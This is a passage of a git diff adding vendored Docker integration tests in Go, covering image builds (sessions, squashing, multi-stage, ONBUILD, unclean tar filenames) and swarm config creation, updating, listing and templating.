+func RemoveOutputForExistingElements(output string, existing []string) string { + res := RemoveLinesForExistingElements(strings.Split(output, "\n"), existing) + return strings.Join(res, "\n") +} diff --git a/vendor/github.com/docker/docker/integration/build/build_session_test.go b/vendor/github.com/docker/docker/integration/build/build_session_test.go new file mode 100644 index 0000000000..dde4b427b4 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/build/build_session_test.go @@ -0,0 +1,129 @@ +package build + +import ( + "context" + "io/ioutil" + "net/http" + "strings" + "testing" + + dclient "github.com/docker/docker/client" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/internal/test/request" + "github.com/moby/buildkit/session" + "github.com/moby/buildkit/session/filesync" + "golang.org/x/sync/errgroup" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestBuildWithSession(t *testing.T) { + skip.If(t, !testEnv.DaemonInfo.ExperimentalBuild) + + client := testEnv.APIClient() + + dockerfile := ` + FROM busybox + COPY file / + RUN cat /file + ` + + fctx := fakecontext.New(t, "", + fakecontext.WithFile("file", "some content"), + ) + defer fctx.Close() + + out := testBuildWithSession(t, client, client.DaemonHost(), fctx.Dir, dockerfile) + assert.Check(t, is.Contains(out, "some content")) + + fctx.Add("second", "contentcontent") + + dockerfile += ` + COPY second / + RUN cat /second + ` + + out = testBuildWithSession(t, client, client.DaemonHost(), fctx.Dir, dockerfile) + assert.Check(t, is.Equal(strings.Count(out, "Using cache"), 2)) + assert.Check(t, is.Contains(out, "contentcontent")) + + du, err := client.DiskUsage(context.TODO()) + assert.Check(t, err) + assert.Check(t, du.BuilderSize > 10) + + out = testBuildWithSession(t, client, client.DaemonHost(), fctx.Dir, dockerfile) + assert.Check(t, is.Equal(strings.Count(out, "Using cache"), 4)) + + du2, err := 
client.DiskUsage(context.TODO()) + assert.Check(t, err) + assert.Check(t, is.Equal(du.BuilderSize, du2.BuilderSize)) + + // rebuild with regular tar, confirm cache still applies + fctx.Add("Dockerfile", dockerfile) + // FIXME(vdemeester) use sock here + res, body, err := request.Do( + "/build", + request.Host(client.DaemonHost()), + request.Method(http.MethodPost), + request.RawContent(fctx.AsTarReader(t)), + request.ContentType("application/x-tar")) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(http.StatusOK, res.StatusCode)) + + outBytes, err := request.ReadBody(body) + assert.NilError(t, err) + assert.Check(t, is.Contains(string(outBytes), "Successfully built")) + assert.Check(t, is.Equal(strings.Count(string(outBytes), "Using cache"), 4)) + + _, err = client.BuildCachePrune(context.TODO()) + assert.Check(t, err) + + du, err = client.DiskUsage(context.TODO()) + assert.Check(t, err) + assert.Check(t, is.Equal(du.BuilderSize, int64(0))) +} + +func testBuildWithSession(t *testing.T, client dclient.APIClient, daemonHost string, dir, dockerfile string) (outStr string) { + ctx := context.Background() + sess, err := session.NewSession(ctx, "foo1", "foo") + assert.Check(t, err) + + fsProvider := filesync.NewFSSyncProvider([]filesync.SyncedDir{ + {Dir: dir}, + }) + sess.Allow(fsProvider) + + g, ctx := errgroup.WithContext(ctx) + + g.Go(func() error { + return sess.Run(ctx, client.DialSession) + }) + + g.Go(func() error { + // FIXME use sock here + res, body, err := request.Do( + "/build?remote=client-session&session="+sess.ID(), + request.Host(daemonHost), + request.Method(http.MethodPost), + request.With(func(req *http.Request) error { + req.Body = ioutil.NopCloser(strings.NewReader(dockerfile)) + return nil + }), + ) + if err != nil { + return err + } + assert.Check(t, is.DeepEqual(res.StatusCode, http.StatusOK)) + out, err := request.ReadBody(body) + assert.NilError(t, err) + assert.Check(t, is.Contains(string(out), "Successfully built")) + sess.Close() + 
outStr = string(out) + return nil + }) + + err = g.Wait() + assert.Check(t, err) + return +} diff --git a/vendor/github.com/docker/docker/integration/build/build_squash_test.go b/vendor/github.com/docker/docker/integration/build/build_squash_test.go new file mode 100644 index 0000000000..4cd282a976 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/build/build_squash_test.go @@ -0,0 +1,103 @@ +package build + +import ( + "bytes" + "context" + "io" + "io/ioutil" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/pkg/stdcopy" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestBuildSquashParent(t *testing.T) { + skip.If(t, !testEnv.DaemonInfo.ExperimentalBuild) + + client := testEnv.APIClient() + + dockerfile := ` + FROM busybox + RUN echo hello > /hello + RUN echo world >> /hello + RUN echo hello > /remove_me + ENV HELLO world + RUN rm /remove_me + ` + + // build and get the ID that we can use later for history comparison + ctx := context.Background() + source := fakecontext.New(t, "", fakecontext.WithDockerfile(dockerfile)) + defer source.Close() + + name := "test" + resp, err := client.ImageBuild(ctx, + source.AsTarReader(t), + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + Tags: []string{name}, + }) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + + inspect, _, err := client.ImageInspectWithRaw(ctx, name) + assert.NilError(t, err) + origID := inspect.ID + + // build with squash + resp, err = client.ImageBuild(ctx, + source.AsTarReader(t), + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + Squash: true, + Tags: []string{name}, + }) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + + cid 
:= container.Run(t, ctx, client, + container.WithImage(name), + container.WithCmd("/bin/sh", "-c", "cat /hello"), + ) + reader, err := client.ContainerLogs(ctx, cid, types.ContainerLogsOptions{ + ShowStdout: true, + }) + assert.NilError(t, err) + + actualStdout := new(bytes.Buffer) + actualStderr := ioutil.Discard + _, err = stdcopy.StdCopy(actualStdout, actualStderr, reader) + assert.NilError(t, err) + assert.Check(t, is.Equal(strings.TrimSpace(actualStdout.String()), "hello\nworld")) + + container.Run(t, ctx, client, + container.WithImage(name), + container.WithCmd("/bin/sh", "-c", "[ ! -f /remove_me ]"), + ) + container.Run(t, ctx, client, + container.WithImage(name), + container.WithCmd("/bin/sh", "-c", `[ "$(echo $HELLO)" == "world" ]`), + ) + + origHistory, err := client.ImageHistory(ctx, origID) + assert.NilError(t, err) + testHistory, err := client.ImageHistory(ctx, name) + assert.NilError(t, err) + + inspect, _, err = client.ImageInspectWithRaw(ctx, name) + assert.NilError(t, err) + assert.Check(t, is.Len(testHistory, len(origHistory)+1)) + assert.Check(t, is.Len(inspect.RootFS.Layers, 2)) +} diff --git a/vendor/github.com/docker/docker/integration/build/build_test.go b/vendor/github.com/docker/docker/integration/build/build_test.go new file mode 100644 index 0000000000..25c5e635bd --- /dev/null +++ b/vendor/github.com/docker/docker/integration/build/build_test.go @@ -0,0 +1,460 @@ +package build // import "github.com/docker/docker/integration/build" + +import ( + "archive/tar" + "bytes" + "context" + "encoding/json" + "io" + "io/ioutil" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/pkg/jsonmessage" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func 
TestBuildWithRemoveAndForceRemove(t *testing.T) { + defer setupTest(t)() + t.Parallel() + cases := []struct { + name string + dockerfile string + numberOfIntermediateContainers int + rm bool + forceRm bool + }{ + { + name: "successful build with no removal", + dockerfile: `FROM busybox + RUN exit 0 + RUN exit 0`, + numberOfIntermediateContainers: 2, + rm: false, + forceRm: false, + }, + { + name: "successful build with remove", + dockerfile: `FROM busybox + RUN exit 0 + RUN exit 0`, + numberOfIntermediateContainers: 0, + rm: true, + forceRm: false, + }, + { + name: "successful build with remove and force remove", + dockerfile: `FROM busybox + RUN exit 0 + RUN exit 0`, + numberOfIntermediateContainers: 0, + rm: true, + forceRm: true, + }, + { + name: "failed build with no removal", + dockerfile: `FROM busybox + RUN exit 0 + RUN exit 1`, + numberOfIntermediateContainers: 2, + rm: false, + forceRm: false, + }, + { + name: "failed build with remove", + dockerfile: `FROM busybox + RUN exit 0 + RUN exit 1`, + numberOfIntermediateContainers: 1, + rm: true, + forceRm: false, + }, + { + name: "failed build with remove and force remove", + dockerfile: `FROM busybox + RUN exit 0 + RUN exit 1`, + numberOfIntermediateContainers: 0, + rm: true, + forceRm: true, + }, + } + + client := request.NewAPIClient(t) + ctx := context.Background() + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + t.Parallel() + dockerfile := []byte(c.dockerfile) + + buff := bytes.NewBuffer(nil) + tw := tar.NewWriter(buff) + assert.NilError(t, tw.WriteHeader(&tar.Header{ + Name: "Dockerfile", + Size: int64(len(dockerfile)), + })) + _, err := tw.Write(dockerfile) + assert.NilError(t, err) + assert.NilError(t, tw.Close()) + resp, err := client.ImageBuild(ctx, buff, types.ImageBuildOptions{Remove: c.rm, ForceRemove: c.forceRm, NoCache: true}) + assert.NilError(t, err) + defer resp.Body.Close() + filter, err := buildContainerIdsFilter(resp.Body) + assert.NilError(t, err) + remainingContainers, 
err := client.ContainerList(ctx, types.ContainerListOptions{Filters: filter, All: true}) + assert.NilError(t, err) + assert.Equal(t, c.numberOfIntermediateContainers, len(remainingContainers), "Expected %v remaining intermediate containers, got %v", c.numberOfIntermediateContainers, len(remainingContainers)) + }) + } +} + +func buildContainerIdsFilter(buildOutput io.Reader) (filters.Args, error) { + const intermediateContainerPrefix = " ---> Running in " + filter := filters.NewArgs() + + dec := json.NewDecoder(buildOutput) + for { + m := jsonmessage.JSONMessage{} + err := dec.Decode(&m) + if err == io.EOF { + return filter, nil + } + if err != nil { + return filter, err + } + if ix := strings.Index(m.Stream, intermediateContainerPrefix); ix != -1 { + filter.Add("id", strings.TrimSpace(m.Stream[ix+len(intermediateContainerPrefix):])) + } + } +} + +func TestBuildMultiStageParentConfig(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.35"), "broken in earlier versions") + dockerfile := ` + FROM busybox AS stage0 + ENV WHO=parent + WORKDIR /foo + + FROM stage0 + ENV WHO=sibling1 + WORKDIR sub1 + + FROM stage0 + WORKDIR sub2 + ` + ctx := context.Background() + source := fakecontext.New(t, "", fakecontext.WithDockerfile(dockerfile)) + defer source.Close() + + apiclient := testEnv.APIClient() + resp, err := apiclient.ImageBuild(ctx, + source.AsTarReader(t), + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + Tags: []string{"build1"}, + }) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + + image, _, err := apiclient.ImageInspectWithRaw(ctx, "build1") + assert.NilError(t, err) + + assert.Check(t, is.Equal("/foo/sub2", image.Config.WorkingDir)) + assert.Check(t, is.Contains(image.Config.Env, "WHO=parent")) +} + +// Test cases in #36996 +func TestBuildLabelWithTargets(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "test added 
after 1.38") + bldName := "build-a" + testLabels := map[string]string{ + "foo": "bar", + "dead": "beef", + } + + dockerfile := ` + FROM busybox AS target-a + CMD ["/dev"] + LABEL label-a=inline-a + FROM busybox AS target-b + CMD ["/dist"] + LABEL label-b=inline-b + ` + + ctx := context.Background() + source := fakecontext.New(t, "", fakecontext.WithDockerfile(dockerfile)) + defer source.Close() + + apiclient := testEnv.APIClient() + // For `target-a` build + resp, err := apiclient.ImageBuild(ctx, + source.AsTarReader(t), + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + Tags: []string{bldName}, + Labels: testLabels, + Target: "target-a", + }) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + + image, _, err := apiclient.ImageInspectWithRaw(ctx, bldName) + assert.NilError(t, err) + + testLabels["label-a"] = "inline-a" + for k, v := range testLabels { + x, ok := image.Config.Labels[k] + assert.Assert(t, ok) + assert.Assert(t, x == v) + } + + // For `target-b` build + bldName = "build-b" + delete(testLabels, "label-a") + resp, err = apiclient.ImageBuild(ctx, + source.AsTarReader(t), + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + Tags: []string{bldName}, + Labels: testLabels, + Target: "target-b", + }) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + + image, _, err = apiclient.ImageInspectWithRaw(ctx, bldName) + assert.NilError(t, err) + + testLabels["label-b"] = "inline-b" + for k, v := range testLabels { + x, ok := image.Config.Labels[k] + assert.Assert(t, ok) + assert.Assert(t, x == v) + } +} + +func TestBuildWithEmptyLayers(t *testing.T) { + dockerfile := ` + FROM busybox + COPY 1/ /target/ + COPY 2/ /target/ + COPY 3/ /target/ + ` + ctx := context.Background() + source := fakecontext.New(t, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFile("1/a", "asdf"), + 
fakecontext.WithFile("2/a", "asdf"), + fakecontext.WithFile("3/a", "asdf")) + defer source.Close() + + apiclient := testEnv.APIClient() + resp, err := apiclient.ImageBuild(ctx, + source.AsTarReader(t), + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + }) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, resp.Body) + resp.Body.Close() + assert.NilError(t, err) +} + +// TestBuildMultiStageOnBuild checks that ONBUILD commands are applied to +// multiple subsequent stages +// #35652 +func TestBuildMultiStageOnBuild(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.33"), "broken in earlier versions") + defer setupTest(t)() + // test both metadata and layer based commands as they may be implemented differently + dockerfile := `FROM busybox AS stage1 +ONBUILD RUN echo 'foo' >somefile +ONBUILD ENV bar=baz + +FROM stage1 +RUN cat somefile # fails if ONBUILD RUN fails + +FROM stage1 +RUN cat somefile` + + ctx := context.Background() + source := fakecontext.New(t, "", + fakecontext.WithDockerfile(dockerfile)) + defer source.Close() + + apiclient := testEnv.APIClient() + resp, err := apiclient.ImageBuild(ctx, + source.AsTarReader(t), + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + }) + + out := bytes.NewBuffer(nil) + assert.NilError(t, err) + _, err = io.Copy(out, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + + assert.Check(t, is.Contains(out.String(), "Successfully built")) + + imageIDs, err := getImageIDsFromBuild(out.Bytes()) + assert.NilError(t, err) + assert.Check(t, is.Equal(3, len(imageIDs))) + + image, _, err := apiclient.ImageInspectWithRaw(context.Background(), imageIDs[2]) + assert.NilError(t, err) + assert.Check(t, is.Contains(image.Config.Env, "bar=baz")) +} + +// #35403 #36122 +func TestBuildUncleanTarFilenames(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.37"), "broken in earlier versions") + ctx := context.TODO() + defer setupTest(t)() + + 
dockerfile := `FROM scratch +COPY foo / +FROM scratch +COPY bar /` + + buf := bytes.NewBuffer(nil) + w := tar.NewWriter(buf) + writeTarRecord(t, w, "Dockerfile", dockerfile) + writeTarRecord(t, w, "../foo", "foocontents0") + writeTarRecord(t, w, "/bar", "barcontents0") + err := w.Close() + assert.NilError(t, err) + + apiclient := testEnv.APIClient() + resp, err := apiclient.ImageBuild(ctx, + buf, + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + }) + + out := bytes.NewBuffer(nil) + assert.NilError(t, err) + _, err = io.Copy(out, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + + // repeat with changed data should not cause cache hits + + buf = bytes.NewBuffer(nil) + w = tar.NewWriter(buf) + writeTarRecord(t, w, "Dockerfile", dockerfile) + writeTarRecord(t, w, "../foo", "foocontents1") + writeTarRecord(t, w, "/bar", "barcontents1") + err = w.Close() + assert.NilError(t, err) + + resp, err = apiclient.ImageBuild(ctx, + buf, + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + }) + + out = bytes.NewBuffer(nil) + assert.NilError(t, err) + _, err = io.Copy(out, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + assert.Assert(t, !strings.Contains(out.String(), "Using cache")) +} + +// docker/for-linux#135 +// #35641 +func TestBuildMultiStageLayerLeak(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.37"), "broken in earlier versions") + ctx := context.TODO() + defer setupTest(t)() + + // all commands need to match until COPY + dockerfile := `FROM busybox +WORKDIR /foo +COPY foo . +FROM busybox +WORKDIR /foo +COPY bar . +RUN [ -f bar ] +RUN [ ! 
-f foo ] +` + + source := fakecontext.New(t, "", + fakecontext.WithFile("foo", "0"), + fakecontext.WithFile("bar", "1"), + fakecontext.WithDockerfile(dockerfile)) + defer source.Close() + + apiclient := testEnv.APIClient() + resp, err := apiclient.ImageBuild(ctx, + source.AsTarReader(t), + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + }) + + out := bytes.NewBuffer(nil) + assert.NilError(t, err) + _, err = io.Copy(out, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + + assert.Check(t, is.Contains(out.String(), "Successfully built")) +} + +func writeTarRecord(t *testing.T, w *tar.Writer, fn, contents string) { + err := w.WriteHeader(&tar.Header{ + Name: fn, + Mode: 0600, + Size: int64(len(contents)), + Typeflag: '0', + }) + assert.NilError(t, err) + _, err = w.Write([]byte(contents)) + assert.NilError(t, err) +} + +type buildLine struct { + Stream string + Aux struct { + ID string + } +} + +func getImageIDsFromBuild(output []byte) ([]string, error) { + var ids []string + for _, line := range bytes.Split(output, []byte("\n")) { + if len(line) == 0 { + continue + } + entry := buildLine{} + if err := json.Unmarshal(line, &entry); err != nil { + return nil, err + } + if entry.Aux.ID != "" { + ids = append(ids, entry.Aux.ID) + } + } + return ids, nil +} diff --git a/vendor/github.com/docker/docker/integration/build/main_test.go b/vendor/github.com/docker/docker/integration/build/main_test.go new file mode 100644 index 0000000000..fef3909fd5 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/build/main_test.go @@ -0,0 +1,33 @@ +package build // import "github.com/docker/docker/integration/build" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil 
{ + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/config/config_test.go b/vendor/github.com/docker/docker/integration/config/config_test.go new file mode 100644 index 0000000000..3cbca23899 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/config/config_test.go @@ -0,0 +1,356 @@ +package config // import "github.com/docker/docker/integration/config" + +import ( + "bytes" + "context" + "encoding/json" + "sort" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/swarm" + "github.com/docker/docker/pkg/stdcopy" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestConfigList(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + ctx := context.Background() + + // This test case is ported from the original TestConfigsEmptyList + configs, err := client.ConfigList(ctx, types.ConfigListOptions{}) + assert.NilError(t, err) + assert.Check(t, is.Equal(len(configs), 0)) + + testName0 := "test0-" + t.Name() + testName1 := "test1-" + t.Name() + testNames := []string{testName0, testName1} + sort.Strings(testNames) + + // create config test0 + createConfig(ctx, t, client, testName0, []byte("TESTINGDATA0"), map[string]string{"type": "test"}) + + config1ID := createConfig(ctx, t, client, testName1, []byte("TESTINGDATA1"), map[string]string{"type": "production"}) + + names := func(entries []swarmtypes.Config) []string { + var values []string + for _, entry := range entries { + values = 
append(values, entry.Spec.Name) + } + sort.Strings(values) + return values + } + + // test by `config ls` + entries, err := client.ConfigList(ctx, types.ConfigListOptions{}) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(names(entries), testNames)) + + testCases := []struct { + filters filters.Args + expected []string + }{ + // test filter by name `config ls --filter name=xxx` + { + filters: filters.NewArgs(filters.Arg("name", testName0)), + expected: []string{testName0}, + }, + // test filter by id `config ls --filter id=xxx` + { + filters: filters.NewArgs(filters.Arg("id", config1ID)), + expected: []string{testName1}, + }, + // test filter by label `config ls --filter label=xxx` + { + filters: filters.NewArgs(filters.Arg("label", "type")), + expected: testNames, + }, + { + filters: filters.NewArgs(filters.Arg("label", "type=test")), + expected: []string{testName0}, + }, + { + filters: filters.NewArgs(filters.Arg("label", "type=production")), + expected: []string{testName1}, + }, + } + for _, tc := range testCases { + entries, err = client.ConfigList(ctx, types.ConfigListOptions{ + Filters: tc.filters, + }) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(names(entries), tc.expected)) + + } +} + +func createConfig(ctx context.Context, t *testing.T, client client.APIClient, name string, data []byte, labels map[string]string) string { + config, err := client.ConfigCreate(ctx, swarmtypes.ConfigSpec{ + Annotations: swarmtypes.Annotations{ + Name: name, + Labels: labels, + }, + Data: data, + }) + assert.NilError(t, err) + assert.Check(t, config.ID != "") + return config.ID +} + +func TestConfigsCreateAndDelete(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + ctx := context.Background() + + testName := "test_config-" + t.Name() + + // This test case is ported from the original TestConfigsCreate + configID 
:= createConfig(ctx, t, client, testName, []byte("TESTINGDATA"), nil) + + insp, _, err := client.ConfigInspectWithRaw(ctx, configID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Name, testName)) + + // This test case is ported from the original TestConfigsDelete + err = client.ConfigRemove(ctx, configID) + assert.NilError(t, err) + + insp, _, err = client.ConfigInspectWithRaw(ctx, configID) + assert.Check(t, is.ErrorContains(err, "No such config")) +} + +func TestConfigsUpdate(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + ctx := context.Background() + + testName := "test_config-" + t.Name() + + // This test case is ported from the original TestConfigsCreate + configID := createConfig(ctx, t, client, testName, []byte("TESTINGDATA"), nil) + + insp, _, err := client.ConfigInspectWithRaw(ctx, configID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.ID, configID)) + + // test UpdateConfig with full ID + insp.Spec.Labels = map[string]string{"test": "test1"} + err = client.ConfigUpdate(ctx, configID, insp.Version, insp.Spec) + assert.NilError(t, err) + + insp, _, err = client.ConfigInspectWithRaw(ctx, configID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test1")) + + // test UpdateConfig with full name + insp.Spec.Labels = map[string]string{"test": "test2"} + err = client.ConfigUpdate(ctx, testName, insp.Version, insp.Spec) + assert.NilError(t, err) + + insp, _, err = client.ConfigInspectWithRaw(ctx, configID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test2")) + + // test UpdateConfig with prefix ID + insp.Spec.Labels = map[string]string{"test": "test3"} + err = client.ConfigUpdate(ctx, configID[:1], insp.Version, insp.Spec) + assert.NilError(t, err) + + insp, _, err = client.ConfigInspectWithRaw(ctx, configID) + 
assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test3")) + + // test UpdateConfig in updating Data which is not supported in daemon + // this test will produce an error in func UpdateConfig + insp.Spec.Data = []byte("TESTINGDATA2") + err = client.ConfigUpdate(ctx, configID, insp.Version, insp.Spec) + assert.Check(t, is.ErrorContains(err, "only updates to Labels are allowed")) +} + +func TestTemplatedConfig(t *testing.T) { + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + ctx := context.Background() + + referencedSecretName := "referencedsecret-" + t.Name() + referencedSecretSpec := swarmtypes.SecretSpec{ + Annotations: swarmtypes.Annotations{ + Name: referencedSecretName, + }, + Data: []byte("this is a secret"), + } + referencedSecret, err := client.SecretCreate(ctx, referencedSecretSpec) + assert.Check(t, err) + + referencedConfigName := "referencedconfig-" + t.Name() + referencedConfigSpec := swarmtypes.ConfigSpec{ + Annotations: swarmtypes.Annotations{ + Name: referencedConfigName, + }, + Data: []byte("this is a config"), + } + referencedConfig, err := client.ConfigCreate(ctx, referencedConfigSpec) + assert.Check(t, err) + + templatedConfigName := "templated_config-" + t.Name() + configSpec := swarmtypes.ConfigSpec{ + Annotations: swarmtypes.Annotations{ + Name: templatedConfigName, + }, + Templating: &swarmtypes.Driver{ + Name: "golang", + }, + Data: []byte("SERVICE_NAME={{.Service.Name}}\n" + + "{{secret \"referencedsecrettarget\"}}\n" + + "{{config \"referencedconfigtarget\"}}\n"), + } + + templatedConfig, err := client.ConfigCreate(ctx, configSpec) + assert.Check(t, err) + + serviceID := swarm.CreateService(t, d, + swarm.ServiceWithConfig( + &swarmtypes.ConfigReference{ + File: &swarmtypes.ConfigReferenceFileTarget{ + Name: "/" + templatedConfigName, + UID: "0", + GID: "0", + Mode: 0600, + }, + ConfigID: templatedConfig.ID, + ConfigName: templatedConfigName, + }, + ), + 
swarm.ServiceWithConfig( + &swarmtypes.ConfigReference{ + File: &swarmtypes.ConfigReferenceFileTarget{ + Name: "referencedconfigtarget", + UID: "0", + GID: "0", + Mode: 0600, + }, + ConfigID: referencedConfig.ID, + ConfigName: referencedConfigName, + }, + ), + swarm.ServiceWithSecret( + &swarmtypes.SecretReference{ + File: &swarmtypes.SecretReferenceFileTarget{ + Name: "referencedsecrettarget", + UID: "0", + GID: "0", + Mode: 0600, + }, + SecretID: referencedSecret.ID, + SecretName: referencedSecretName, + }, + ), + swarm.ServiceWithName("svc"), + ) + + var tasks []swarmtypes.Task + waitAndAssert(t, 60*time.Second, func(t *testing.T) bool { + tasks = swarm.GetRunningTasks(t, d, serviceID) + return len(tasks) > 0 + }) + + task := tasks[0] + waitAndAssert(t, 60*time.Second, func(t *testing.T) bool { + if task.NodeID == "" || (task.Status.ContainerStatus == nil || task.Status.ContainerStatus.ContainerID == "") { + task, _, _ = client.TaskInspectWithRaw(context.Background(), task.ID) + } + return task.NodeID != "" && task.Status.ContainerStatus != nil && task.Status.ContainerStatus.ContainerID != "" + }) + + attach := swarm.ExecTask(t, d, task, types.ExecConfig{ + Cmd: []string{"/bin/cat", "/" + templatedConfigName}, + AttachStdout: true, + AttachStderr: true, + }) + + expect := "SERVICE_NAME=svc\n" + + "this is a secret\n" + + "this is a config\n" + assertAttachedStream(t, attach, expect) + + attach = swarm.ExecTask(t, d, task, types.ExecConfig{ + Cmd: []string{"mount"}, + AttachStdout: true, + AttachStderr: true, + }) + assertAttachedStream(t, attach, "tmpfs on /"+templatedConfigName+" type tmpfs") +} + +func assertAttachedStream(t *testing.T, attach types.HijackedResponse, expect string) { + buf := bytes.NewBuffer(nil) + _, err := stdcopy.StdCopy(buf, buf, attach.Reader) + assert.NilError(t, err) + assert.Check(t, is.Contains(buf.String(), expect)) +} + +func waitAndAssert(t *testing.T, timeout time.Duration, f func(*testing.T) bool) { + t.Helper() + after := 
time.After(timeout) + for { + select { + case <-after: + t.Fatalf("timed out waiting for condition") + default: + } + if f(t) { + return + } + time.Sleep(100 * time.Millisecond) + } +} + +func TestConfigInspect(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + ctx := context.Background() + + testName := t.Name() + configID := createConfig(ctx, t, client, testName, []byte("TESTINGDATA"), nil) + + insp, body, err := client.ConfigInspectWithRaw(ctx, configID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Name, testName)) + + var config swarmtypes.Config + err = json.Unmarshal(body, &config) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(config, insp)) +} diff --git a/vendor/github.com/docker/docker/integration/config/main_test.go b/vendor/github.com/docker/docker/integration/config/main_test.go new file mode 100644 index 0000000000..3c8f0483f2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/config/main_test.go @@ -0,0 +1,33 @@ +package config // import "github.com/docker/docker/integration/config" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/container/copy_test.go b/vendor/github.com/docker/docker/integration/container/copy_test.go new file mode 100644 index 0000000000..241b719eb7 --- /dev/null +++ 
